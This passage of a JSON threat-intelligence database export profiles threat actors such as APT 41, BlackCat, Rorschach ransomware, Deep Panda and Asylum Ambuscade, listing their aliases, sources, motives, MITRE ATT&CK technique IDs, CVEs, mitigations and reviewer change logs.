    "Blackfly",
    "Brass Typhoon",
    "Bronze Atlas",
    "HOODOO",
    "Wicked Panda",
    "Winnti"
  ],
  "sources": [
    "The Hacker News",
    "Infosecurity Magazine",
    "Lookout",
    "MITRE ATT&CK",
    "Overt Operator",
    "Bleeping Computer"
  ],
  "country_of_origin": "CN",
  "threat_actor_motives": [
    "Financial Gain",
    "Espionage"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft",
    "Disruption of Service",
    "Damage and Destruction",
    "Espionage",
    "Disinformation",
    "Credential Harvesting",
    "Creating Botnets",
    "Cyber Stalking",
    "Resource Hijacking"
  ],
  "threat_actor_capabilities": [
    "T1190",
    "T1133",
    "T1078",
    "T1566.001",
    "T1195.002",
    "T1203",
    "T1047",
    "T1059",
    "T1569.002",
    "T1098",
    "T1197",
    "T1547.001",
    "T1136.003",
    "T1543.003",
    "T1546.008",
    "T1480.001",
    "T0170.003",
    "T0170.001",
    "T1070.004",
    "T1036.004",
    "T1036.005",
    "T1553.002",
    "T1218.001",
    "T1218.011",
    "T1110.002",
    "T1056.001",
    "T1003.001",
    "T1083",
    "T1135",
    "T1016",
    "T1049",
    "T1033",
    "T1021.001",
    "T1021.002",
    "T1005",
    "T1560.001",
    "T1008",
    "T1105",
    "T1104",
    "T1090",
    "T1102.001",
    "T1071.001",
    "T1071.002",
    "T1568.002",
    "T1041",
    "T1567",
    "T1048.003",
    "T1486",
    "T1496"
  ],
  "threat_actor_resources": [
    "organization",
    "government"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "advanced",
  "target_countries": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--ef2d23ce-63f5-4f4e-b0fa-d09a5d743cc8",
    "x-industry-sector--2ee175fb-298f-43e8-a76c-8c02638598c5",
    "x-industry-sector--95c98046-4589-4c5f-976a-99089bb77b37",
    "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f",
    "x-industry-sector--8b825e7f-a701-41df-8938-8c304dc6d860",
    "x-industry-sector--c88e363f-e571-4d51-937b-ebb88a6dafcb",
    "x-industry-sector--ac92c6e8-7936-475d-ab9f-0c12012582e6",
    "x-industry-sector--9ec6b337-b075-4143-8bda-13b2fdeea8f1"
  ],
  "attack_mitigations": "",
  "attack_consequences": "Interruption of Service, Loss of Data, Termination of Data, Financial Loss",
  "vulnerabilities": [
    "CVE-2019-19781",
    "CVE-2020-10189",
    "CVE-2021-44207",
    "CVE-2021-44228"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"APT 41\", \"country_of_origin\": \"CN\", \"attack_mitigations\": \"\", \"attack_consequences\": \"Interruption of Service, Loss of Data, Termination of Data, Financial Loss\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"APT 41 is a Chinese state-sponsored threat group known for financial gain and cyber espionage. They have been operational since at least 2007 and target organizations and government agencies for intellectual property theft.\", \"target_countries\": [], \"target_regions\": [\"americas\", \"asia\", \"europe\"], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\", \"Espionage\", \"Disinformation\", \"Credential Harvesting\", \"Creating Botnets\", \"Cyber Stalking\", \"Resource Hijacking\"], \"target_industry_sectors\": [\"government\", \"government-local\", \"government-national\", \"government-public-services\", \"government-regional\", \"technology\", \"telecommunications\", \"utilities\"], \"threat_actor_capabilities\": [\"T1190\", \"T1133\", \"T1078\", \"T1566.001\", \"T1195.002\", \"T1203\", \"T1047\", \"T1059\", \"T1569.002\", \"T1098\", \"T1197\", \"T1547.001\", \"T1136.003\", \"T1543.003\", \"T1546.008\", \"T1480.001\", \"T0170.003\", \"T0170.001\", \"T1070.004\", \"T1036.004\", \"T1036.005\", \"T1553.002\", \"T1218.001\", \"T1218.011\", \"T1110.002\", \"T1056.001\", \"T1003.001\", \"T1083\", \"T1135\", \"T1016\", \"T1049\", \"T1033\", \"T1021.001\", \"T1021.002\", \"T1005\", \"T1560.001\", \"T1008\", \"T1105\", \"T1104\", \"T1090\", \"T1102.001\", \"T1071.001\", \"T1071.002\", \"T1568.002\", \"T1041\", \"T1567\", \"T1048.003\", \"T1486\", \"T1496\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"organization\", \"government\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"Axiom\", \"Blackfly\", \"Brass Typhoon\", \"Bronze Atlas\", \"HOODOO\", \"Wicked Panda\", \"Winnti\"], \"vulnerabilities\": [\"CVE-2019-19781\", \"CVE-2020-10189\", \"CVE-2021-44207\", \"CVE-2021-44228\"], \"sources\": [\"The Hacker News\", \"Infosecurity Magazine\", \"Lookout\", \"MITRE ATT&CK\", \"Overt Operator\", \"Bleeping Computer\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"APT 41\"], \"aliases\": [\"Axiom\", \"Blackfly\", \"Brass Typhoon\", \"Bronze Atlas\", \"HOODOO\", \"Wicked Panda\", \"Winnti\"], \"country_of_origin\": [\"CN\"], \"target_countries\": [], \"target_regions\": [\"americas\", \"asia\", \"europe\"], \"threat_actor_overview\": [\"APT 41 is a Chinese state-sponsored threat group known for financial gain and cyber espionage. They have been operational since at least 2007 and target organizations and government agencies for intellectual property theft.\"], \"target_populations\": [], \"target_industry_sectors\": [\"government\", \"government-local\", \"government-national\", \"government-public-services\", \"government-regional\", \"technology\", \"telecommunications\", \"utilities\"], \"threat_actor_intent\": [\"Information Theft\", \"Financial Theft\", \"Disruption of Service\", \"Damage and Destruction\", \"Espionage\", \"Disinformation\", \"Credential Harvesting\", \"Creating Botnets\", \"Cyber Stalking\", \"Resource Hijacking\"], \"threat_actor_capabilities\": [\"T1190\", \"T1133\", \"T1078\", \"T1566.001\", \"T1195.002\", \"T1203\", \"T1047\", \"T1059\", \"T1569.002\", \"T1098\", \"T1197\", \"T1547.001\", \"T1136.003\", \"T1543.003\", \"T1546.008\", \"T1480.001\", \"T0170.003\", \"T0170.001\", \"T1070.004\", \"T1036.004\", \"T1036.005\", \"T1553.002\", \"T1218.001\", \"T1218.011\", \"T1110.002\", \"T1056.001\", \"T1003.001\", \"T1083\", \"T1135\", \"T1016\", \"T1049\", \"T1033\", \"T1021.001\", \"T1021.002\", \"T1005\", \"T1560.001\", \"T1008\", \"T1105\", \"T1104\", \"T1090\", \"T1102.001\", \"T1071.001\", \"T1071.002\", \"T1568.002\", \"T1041\", \"T1567\", \"T1048.003\", \"T1486\", \"T1496\"], \"threat_actor_motives\": [\"Financial Gain\", \"Espionage\"], \"threat_actor_resources\": [\"organization\", \"government\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"nation-state\"], \"attack_mitigations\": [], \"attack_consequences\": [\"Interruption of Service\", \"Loss of Data\", \"Termination of Data\", \"Financial Loss\"], \"vulnerabilities\": [\"CVE-2019-19781\", \"CVE-2020-10189\", \"CVE-2021-44207\", \"CVE-2021-44228\"], \"sources\": [\"The Hacker News\", \"Infosecurity Magazine\", \"Lookout\", \"MITRE ATT&CK\", \"Overt Operator\", \"Bleeping Computer\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-09-06T18:16:19.565Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64f8bfee794210630ad43860"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-06T18:07:42.432Z"
      },
      "changes": [
        {
          "field": "target_regions",
          "previous_value": [
            "americas",
            "asia",
            "europe"
          ],
          "updated_value": []
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f8bf6f794210630ad4385f"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-06T18:05:35.406Z"
      },
      "changes": [
        {
          "field": "threat_actor_sophistication",
          "previous_value": "intermediate",
          "updated_value": "advanced"
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f8bf5c794210630ad4385e"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-06T18:05:16.065Z"
      },
      "changes": [
        {
          "field": "threat_actor_sophistication",
          "previous_value": "none",
          "updated_value": "intermediate"
        }
      ]
    }
  ],
  "threat_actor": "APT 41"
},
{
  "_id": {
    "$oid": "64f25375a9c7e1466a414a7d"
  },
  "report": {
    "$oid": "64f25323cd46cfce622c3dc2"
  },
  "threat_actor_overview": "ALPHV/BlackCat is a ransomware threat group that has been active since November 2021. They utilize the Ransomware-as-a-Service (RaaS) model and have targeted various sectors and organizations globally.",
  "aliases": [
    "ALPHV"
  ],
  "sources": [
    "Heimdal Security",
    "Help Net Security",
    "MITRE ATT&CK",
    "SecurityWeek",
    "SC Media"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Disruption of Service",
    "Financial Theft"
  ],
  "threat_actor_capabilities": [
    "T1047",
    "T1059.003",
    "T1134",
    "T1548.002",
    "T1222.001",
    "T1070.001",
    "T1112",
    "T1083",
    "T1135",
    "T1087.002",
    "T1069.002",
    "T1018",
    "T1082",
    "T1033",
    "T1570",
    "T1486",
    "T1491.001",
    "T1561.001",
    "T1490",
    "T1489"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "criminal",
    "hacker"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [
    "africa",
    "americas",
    "asia",
    "europe"
  ],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--bb358902-b786-4067-9de8-75277fe7a71e",
    "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f"
  ],
  "attack_mitigations": "Never click on advertisements on workstation computers, Disable Hyperlinks and Attachments on external emails, Practice good password habits, Regularly monitor active directories, Regularly monitor networks for malicious traffic",
  "attack_consequences": "Interruption of Service, Loss of Data, Possible Termination of Data, Data Encryption, Financial Loss",
  "vulnerabilities": [
    "CVE-2021-34473",
    "CVE-2021-34523",
    "CVE-2021-31207"
  ],
  "raw_serialized_analysis": "{\"threat_actor\": \"ALPHV/BlackCat\", \"country_of_origin\": \"\", \"attack_mitigations\": \"Never click on advertisements on workstation computers, Disable Hyperlinks and Attachments on external emails, Practice good password habits, Regularly monitor active directories, Regularly monitor networks for malicious traffic\", \"attack_consequences\": \"Interruption of Service, Loss of Data, Possible Termination of Data, Data Encryption, Financial Loss\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"ALPHV/BlackCat is a ransomware threat group that has been active since November 2021. They utilize the Ransomware-as-a-Service (RaaS) model and have targeted various sectors and organizations globally.\", \"target_countries\": [], \"target_regions\": [\"africa\", \"americas\", \"asia\", \"europe\"], \"target_populations\": [], \"threat_actor_intent\": [\"Disruption of Service\", \"Financial Theft\"], \"target_industry_sectors\": [\"government\", \"healthcare\"], \"threat_actor_capabilities\": [\"T1047\", \"T1059.003\", \"T1134\", \"T1548.002\", \"T1222.001\", \"T1070.001\", \"T1112\", \"T1083\", \"T1135\", \"T1087.002\", \"T1069.002\", \"T1018\", \"T1082\", \"T1033\", \"T1570\", \"T1486\", \"T1491.001\", \"T1561.001\", \"T1490\", \"T1489\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"hacker\"], \"aliases\": [], \"vulnerabilities\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"sources\": [\"Heimdal Security\", \"Help Net Security\", \"MITRE ATT&CK\", \"SecurityWeek\", \"SC Media\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"ALPHV/BlackCat\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [\"africa\", \"americas\", \"asia\", \"europe\"], \"threat_actor_overview\": [\"ALPHV/BlackCat is a ransomware threat group that has been active since November 2021. They utilize the Ransomware-as-a-Service (RaaS) model and have targeted various sectors and organizations globally.\"], \"target_populations\": [], \"target_industry_sectors\": [\"government\", \"healthcare\", \"professional-services\"], \"threat_actor_intent\": [\"Disruption of Service\", \"Financial Theft\"], \"threat_actor_capabilities\": [\"T1047\", \"T1059.003\", \"T1134\", \"T1548.002\", \"T1222.001\", \"T1070.001\", \"T1112\", \"T1083\", \"T1135\", \"T1087.002\", \"T1069.002\", \"T1018\", \"T1082\", \"T1033\", \"T1570\", \"T1486\", \"T1491.001\", \"T1561.001\", \"T1490\", \"T1489\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"hacker\"], \"attack_mitigations\": [\"Never click on advertisements on workstation computers\", \"Disable Hyperlinks and Attachments on external emails\", \"Practice good password habits\", \"Regularly monitor active directories\", \"Regularly monitor networks for malicious traffic\"], \"attack_consequences\": [\"Interruption of Service\", \"Loss of Data\", \"Possible Termination of Data\", \"Data Encryption\", \"Financial Loss\"], \"vulnerabilities\": [\"CVE-2021-34473\", \"CVE-2021-34523\", \"CVE-2021-31207\"], \"sources\": [\"Heimdal Security\", \"Help Net Security\", \"MITRE ATT&CK\", \"SecurityWeek\", \"SC Media\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-09-06T18:24:56.444Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "64f253d1cd46cfce622c3dc4"
      },
      "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
      "updated_on": {
        "$date": "2023-09-01T21:12:49.704Z"
      },
      "changes": [
        {
          "field": "aliases",
          "previous_value": [],
          "updated_value": [
            "ALPHV"
          ]
        },
        {
          "field": "threat_actor_type",
          "previous_value": [
            "hacker"
          ],
          "updated_value": [
            "criminal",
            "hacker"
          ]
        }
      ]
    },
    {
      "_id": {
        "$oid": "64f253b4cd46cfce622c3dc3"
      },
      "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
      "updated_on": {
        "$date": "2023-09-01T21:12:20.259Z"
      },
      "changes": [
        {
          "field": "threat_actor",
          "previous_value": "ALPHV/BlackCat",
          "updated_value": "BlackCat"
        }
      ]
    }
  ],
  "threat_actor": "BlackCat"
},
{
  "_id": {
    "$oid": "64f261c6f41e0eea483c5260"
  },
  "report": {
    "$oid": "64f261a468b10964a0344c1e"
  },
  "threat_actor_overview": "Rorschach is a newly emerged ransomware variant that is customized from the Babuk ransomware code. It is known for its exceptional encryption speed,  surpassing LockBit 3.0. Rorschach has self-propagating and autonomous capabilities,  leveraging Active Directory Domain Group Policy Objects (GPO) to rapidly spread throughout a network. It utilizes specific Windows capabilities,  such as I/O completion ports,  for efficient multithreaded encryption. Rorschach employs the HC-128 stream cipher for encryption and Curve25519 asymmetric key exchange. It incorporates deception technology to evade detection., Rorschach is a newly emerged ransomware variant that has gained recognition for its exceptional encryption speed,  surpassing LockBit 3.0. It was first discovered in April 2023 and is a customized version of the Babuk ransomware code. What sets Rorschach apart is its self-propagating and autonomous capability,  utilizing Active Directory Domain Group Policy Objects (GPO) to rapidly spread throughout a network and infect every endpoint at remarkable speeds. By leveraging specific Windows capabilities and employing the HC-128 stream cipher for encryption,  Rorschach achieves impressive performance. Additionally,  it utilizes Curve25519 asymmetric key exchange and implements innovative techniques like deception technology to evade detection. While it excels in speed,  Rorschach does not currently engage in double extortion by exfiltrating data. Overall,  Rorschach stands out with its speed,  customization,  and unique features,  such as making direct system calls,  making it a noteworthy threat group in the ransomware landscape., Rorschach is a newly emerged ransomware variant known for its exceptional encryption speed and unique features. It is a customized version of the Babuk ransomware code. Rorschach stands out with its self-propagating and autonomous capability,  utilizing Active Directory Domain Group Policy Objects (GPO) to rapidly spread throughout a network.",
  "aliases": [],
  "sources": [
    "Anomali",
    "Allinfosecnews",
    "DarkReading",
    "HackRead",
    "MITRE ATT&CK"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain"
  ],
  "threat_actor_intent": [
    "Financial Theft",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [
    "T1053.005",
    "T1484.001",
    "T1027.002",
    "T1140",
    "T1070.004",
    "T1070.001",
    "T1489",
    "T1490",
    "T1574.002",
    "T1486"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "unknown",
    "criminal"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Rorschach\", \"country_of_origin\": \"\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Rorschach is a newly emerged ransomware variant that is customized from the Babuk ransomware code. It is known for its exceptional encryption speed,  surpassing LockBit 3.0. Rorschach has self-propagating and autonomous capabilities,  leveraging Active Directory Domain Group Policy Objects (GPO) to rapidly spread throughout a network. It utilizes specific Windows capabilities,  such as I/O completion ports,  for efficient multithreaded encryption. Rorschach employs the HC-128 stream cipher for encryption and Curve25519 asymmetric key exchange. It incorporates deception technology to evade detection., Rorschach is a newly emerged ransomware variant that has gained recognition for its exceptional encryption speed,  surpassing LockBit 3.0. It was first discovered in April 2023 and is a customized version of the Babuk ransomware code. What sets Rorschach apart is its self-propagating and autonomous capability,  utilizing Active Directory Domain Group Policy Objects (GPO) to rapidly spread throughout a network and infect every endpoint at remarkable speeds. By leveraging specific Windows capabilities and employing the HC-128 stream cipher for encryption,  Rorschach achieves impressive performance. Additionally,  it utilizes Curve25519 asymmetric key exchange and implements innovative techniques like deception technology to evade detection. While it excels in speed,  Rorschach does not currently engage in double extortion by exfiltrating data. Overall,  Rorschach stands out with its speed,  customization,  and unique features,  such as making direct system calls,  making it a noteworthy threat group in the ransomware landscape., Rorschach is a newly emerged ransomware variant known for its exceptional encryption speed and unique features. It is a customized version of the Babuk ransomware code. Rorschach stands out with its self-propagating and autonomous capability,  utilizing Active Directory Domain Group Policy Objects (GPO) to rapidly spread throughout a network.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Financial Theft\", \"Disruption of Service\"], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_capabilities\": [\"T1053.005\", \"T1484.001\", \"T1027.002\", \"T1140\", \"T1070.004\", \"T1070.001\", \"T1489\", \"T1490\", \"T1574.002\", \"T1486\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"unknown\", \"criminal\"], \"aliases\": [], \"vulnerabilities\": [], \"sources\": [\"Anomali\", \"Allinfosecnews\", \"DarkReading\", \"HackRead\", \"MITRE ATT&CK\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Rorschach\"], \"aliases\": [], \"country_of_origin\": [], \"target_countries\": [], \"target_regions\": [], \"threat_actor_overview\": [\"Rorschach is a newly emerged ransomware variant that is customized from the Babuk ransomware code. It is known for its exceptional encryption speed\", \" surpassing LockBit 3.0. Rorschach has self-propagating and autonomous capabilities\", \" leveraging Active Directory Domain Group Policy Objects (GPO) to rapidly spread throughout a network. It utilizes specific Windows capabilities\", \" such as I/O completion ports\", \" for efficient multithreaded encryption. Rorschach employs the HC-128 stream cipher for encryption and Curve25519 asymmetric key exchange. It incorporates deception technology to evade detection.\", \"Rorschach is a newly emerged ransomware variant that has gained recognition for its exceptional encryption speed\", \" surpassing LockBit 3.0. It was first discovered in April 2023 and is a customized version of the Babuk ransomware code. What sets Rorschach apart is its self-propagating and autonomous capability\", \" utilizing Active Directory Domain Group Policy Objects (GPO) to rapidly spread throughout a network and infect every endpoint at remarkable speeds. By leveraging specific Windows capabilities and employing the HC-128 stream cipher for encryption\", \" Rorschach achieves impressive performance. Additionally\", \" it utilizes Curve25519 asymmetric key exchange and implements innovative techniques like deception technology to evade detection. While it excels in speed\", \" Rorschach does not currently engage in double extortion by exfiltrating data. Overall\", \" Rorschach stands out with its speed\", \" customization\", \" and unique features\", \" such as making direct system calls\", \" making it a noteworthy threat group in the ransomware landscape.\", \"Rorschach is a newly emerged ransomware variant known for its exceptional encryption speed and unique features. It is a customized version of the Babuk ransomware code. Rorschach stands out with its self-propagating and autonomous capability\", \" utilizing Active Directory Domain Group Policy Objects (GPO) to rapidly spread throughout a network.\"], \"target_populations\": [], \"target_industry_sectors\": [\"financial-services\"], \"threat_actor_intent\": [\"Financial Gain\", \"Financial Theft\", \"Disruption of Service\"], \"threat_actor_capabilities\": [\"T1053.005\", \"T1484.001\", \"T1027.002\", \"T1140\", \"T1070.004\", \"T1070.001\", \"T1489\", \"T1490\", \"T1574.002\", \"T1486\"], \"threat_actor_motives\": [\"Financial Gain\"], \"threat_actor_resources\": [\"unknown\", \"organization\"], \"threat_actor_sophistication\": [\"advanced\"], \"threat_actor_type\": [\"unknown\", \"criminal\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"Anomali\", \"Allinfosecnews\", \"DarkReading\", \"HackRead\", \"MITRE ATT&CK\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-09-06T18:26:56.608Z"
  },
  "approval_message": "",
  "change_log": [],
  "threat_actor": "Rorschach"
},
{
  "_id": {
    "$oid": "64f266c86e151df253458fd5"
  },
  "report": {
    "$oid": "64f0f97565258c763358dfeb"
  },
  "threat_actor_overview": "Deep Panda is a Chinese advanced persistent threat (APT) hacking group that has been active for at least a decade. They target government,  defense,  healthcare,  telecoms,  and financial organizations for data theft and surveillance., Deep Panda is a Chinese advanced persistent threat (APT) hacking group that has been active for at least a decade. They primarily target government,  and financial organizations,  among others,  for purposes such as data theft and surveillance., Deep Panda is an advanced persistent threat (APT) hacking group known to target government,  and financial organizations. They have been active for at least a decade and are based in China.,  and financial organizations for purposes including data theft and surveillance.",
  "aliases": [
    "Deep Panda",
    "Winnti"
  ],
  "sources": [
    "FortiGuard Labs"
  ],
  "country_of_origin": "CN, China",
  "threat_actor_motives": [
    "Espionage",
    "Financial Gain",
    "Hacktivism",
    "Cyberwarfare"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Espionage",
    "Financial Theft",
    "Disruption of Service"
  ],
  "threat_actor_capabilities": [
    "T1014",
    "T1055",
    "T1070"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "nation-state"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--9ec6b337-b075-4143-8bda-13b2fdeea8f1",
    "x-industry-sector--bb358902-b786-4067-9de8-75277fe7a71e",
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
    "x-industry-sector--0c895333-cced-4b2a-bd60-de0e8f0f2ba8",
    "x-industry-sector--f63a87bf-e5cf-4afb-b239-9c4d657b661f"
  ],
  "attack_mitigations": "",
  "attack_consequences": "",
  "vulnerabilities": [],
  "raw_serialized_analysis": "{\"threat_actor\": \"Deep Panda\", \"country_of_origin\": \"CN, China\", \"attack_mitigations\": \"\", \"attack_consequences\": \"\", \"threat_actor_sophistication\": null, \"threat_actor_overview\": \"Deep Panda is a Chinese advanced persistent threat (APT) hacking group that has been active for at least a decade. They target government,  defense,  healthcare,  telecoms,  and financial organizations for data theft and surveillance., Deep Panda is a Chinese advanced persistent threat (APT) hacking group that has been active for at least a decade. They primarily target government,  and financial organizations,  among others,  for purposes such as data theft and surveillance., Deep Panda is an advanced persistent threat (APT) hacking group known to target government,  and financial organizations. They have been active for at least a decade and are based in China.,  and financial organizations for purposes including data theft and surveillance.\", \"target_countries\": [], \"target_regions\": [], \"target_populations\": [], \"threat_actor_intent\": [\"Information Theft\", \"Espionage\", \"Financial Theft\", \"Disruption of Service\"], \"target_industry_sectors\": [\"government\", \"defense\", \"healthcare\", \"telecommunications\", \"financial-services\"], \"threat_actor_capabilities\": [\"T1087\", \"T1060\", \"T1003\", \"T1114\", \"T1116\", \"T1014\", \"T1033\", \"T1008\", \"T1086\", \"T1049\", \"T1055\", \"T1070\", \"T1050\", \"T1105\"], \"threat_actor_motives\": [\"Espionage\", \"Financial Gain\", \"Hacktivism\", \"Cyberwarfare\"], \"threat_actor_resources\": [\"organization\"], \"threat_actor_type\": [\"nation-state\"], \"aliases\": [\"Deep Panda\", \" Winnti\"], \"vulnerabilities\": [], \"sources\": [\"FortiGuard Labs\"]}",
  "raw_openAI_analysis": "{\"threat_actor\": [\"Deep Panda\"], \"aliases\": [\"Deep Panda\", \" Winnti\"], \"country_of_origin\": [\"CN\", \"China\"], \"target_countries\": [], \"target_regions\": [\"Asia\", \"Americas\", \"Europe\"], \"threat_actor_overview\": [\"Deep Panda is a Chinese advanced persistent threat (APT) hacking group that has been active for at least a decade. They target government\", \" defense\", \" healthcare\", \" telecoms\", \" and financial organizations for data theft and surveillance.\", \"Deep Panda is a Chinese advanced persistent threat (APT) hacking group that has been active for at least a decade. They primarily target government\", \" and financial organizations\", \" among others\", \" for purposes such as data theft and surveillance.\", \"Deep Panda is an advanced persistent threat (APT) hacking group known to target government\", \" and financial organizations. They have been active for at least a decade and are based in China.\", \" and financial organizations for purposes including data theft and surveillance.\"], \"target_populations\": [], \"target_industry_sectors\": [\"government\", \"defense\", \"healthcare\", \"telecommunications\", \"financial-services\", \"Financial Services\", \"Travel\", \"Cosmetic\", \"Technology\", \"Telecommunications\", \"Government\", \"Healthcare\", \"Defense\"], \"threat_actor_intent\": [\"Information Theft\", \"Espionage\", \"Financial Theft\", \"Disruption of Service\"], \"threat_actor_capabilities\": [\"T1087\", \"T1060\", \"T1003\", \"T1114\", \"T1116\", \"T1014\", \"T1033\", \"T1008\", \"T1086\", \"T1049\", \"T1055\", \"T1070\", \"T1050\", \"T1105\"], \"threat_actor_motives\": [\"Espionage\", \"Financial Gain\", \"Hacktivism\", \"Cyberwarfare\"], \"threat_actor_resources\": [\"organization\", \"Organization\", \"Government\"], \"threat_actor_sophistication\": [\"advanced\", \"Advanced\"], \"threat_actor_type\": [\"nation-state\", \"Hacker\", \"Nation-State\"], \"attack_mitigations\": [], \"attack_consequences\": [], \"vulnerabilities\": [], \"sources\": [\"FortiGuard Labs\"]}",
  "approval_status": "APPROVED",
  "approval_status_changed_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "approval_status_changed_on": {
    "$date": "2023-09-29T18:13:49.003Z"
  },
  "approval_message": "",
  "change_log": [
    {
      "_id": {
        "$oid": "651713ca61972ef79f695771"
      },
      "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
      "updated_on": {
        "$date": "2023-09-29T18:13:30.592Z"
      },
      "changes": [
        {
          "field": "aliases",
          "previous_value": [
            "Deep Panda",
            " Winnti"
          ],
          "updated_value": [
            "Deep Panda",
            "Winnti"
          ]
        },
        {
          "field": "threat_actor_capabilities",
          "previous_value": [
            "T1087",
            "T1060",
            "T1003",
            "T1114",
            "T1116",
            "T1014",
            "T1033",
            "T1008",
            "T1086",
            "T1049",
            "T1055",
            "T1070",
            "T1050",
            "T1105"
          ],
          "updated_value": [
            "T1014",
            "T1055",
            "T1070"
          ]
        }
      ]
    }
  ],
  "threat_actor": "Deep Panda"
},
{
  "_id": {
    "$oid": "64f745ed08cba1d7e56f472a"
  },
  "report": {
    "$oid": "64f74502ed13c104bf6d21bf"
  },
  "threat_actor_overview": "Asylum Ambuscade is a cybercrime group that is also involved in cyberespionage. They have been operating since at least 2020 and have targeted various industries and government entities in Europe and Central Asia. Their primary motives appear to be financial gain and cyberespionage., Asylum Ambuscade is a cybercrime group believed to have originated in 2020. They primarily target the financial sector,  including crypto-traders,  government agencies,  and organizations providing assistance to refugees during the Russian-Ukraine war., Asylum Ambuscade is a cybercrime group that engages in cyberespionage activities on the side. They primarily target the financial sectors,  including cryptocurrency traders and bank accounts,  as well as government agencies. They have been involved in campaigns targeting organizations assisting refugees during the Russian-Ukraine war., Asylum Ambuscade is believed to have commenced its activities in 2020,  and it was officially identified in 2022. Despite the obscurity surrounding the group's origins,  their primary targets have become discernible. Distinctly focusing on the financial sectors,  and government agencies. Notably,  they have orchestrated a significant campaign directed towards organizations providing assistance to refugees during the Russian-Ukraine war., Asylum Ambuscade is a cybercrime group that engages in cyberespionage. They primarily target the financial sectors,  and government agencies. They have also conducted campaigns against organizations assisting refugees during the Russian-Ukraine war., Asylum Ambuscade is a threat group that targets the financial sectors and government agencies,  with a particular focus on crypto-traders and organizations assisting refugees during the Russian-Ukraine war.",
  "aliases": [],
  "sources": [
    "allinfosec",
    "SC Magazine",
    "Dark Reading",
    "Welivesecurity",
    "ProofPoint",
    "BleepingComputer"
  ],
  "country_of_origin": "",
  "threat_actor_motives": [
    "Financial Gain",
    "Espionage"
  ],
  "threat_actor_intent": [
    "Information Theft",
    "Financial Theft",
    "Espionage",
    "Disruption of Service"
  ],
  "threat_actor_resources": [
    "organization"
  ],
  "threat_actor_type": [
    "criminal",
    "unknown"
  ],
  "threat_actor_sophistication": "none",
  "target_countries": [
    "UA",
    "EU"
  ],
  "target_regions": [],
  "target_populations": [],
  "target_industry_sectors": [
    "x-industry-sector--37cd57c3-5b59-441c-92b0-0f28cf83c5df",
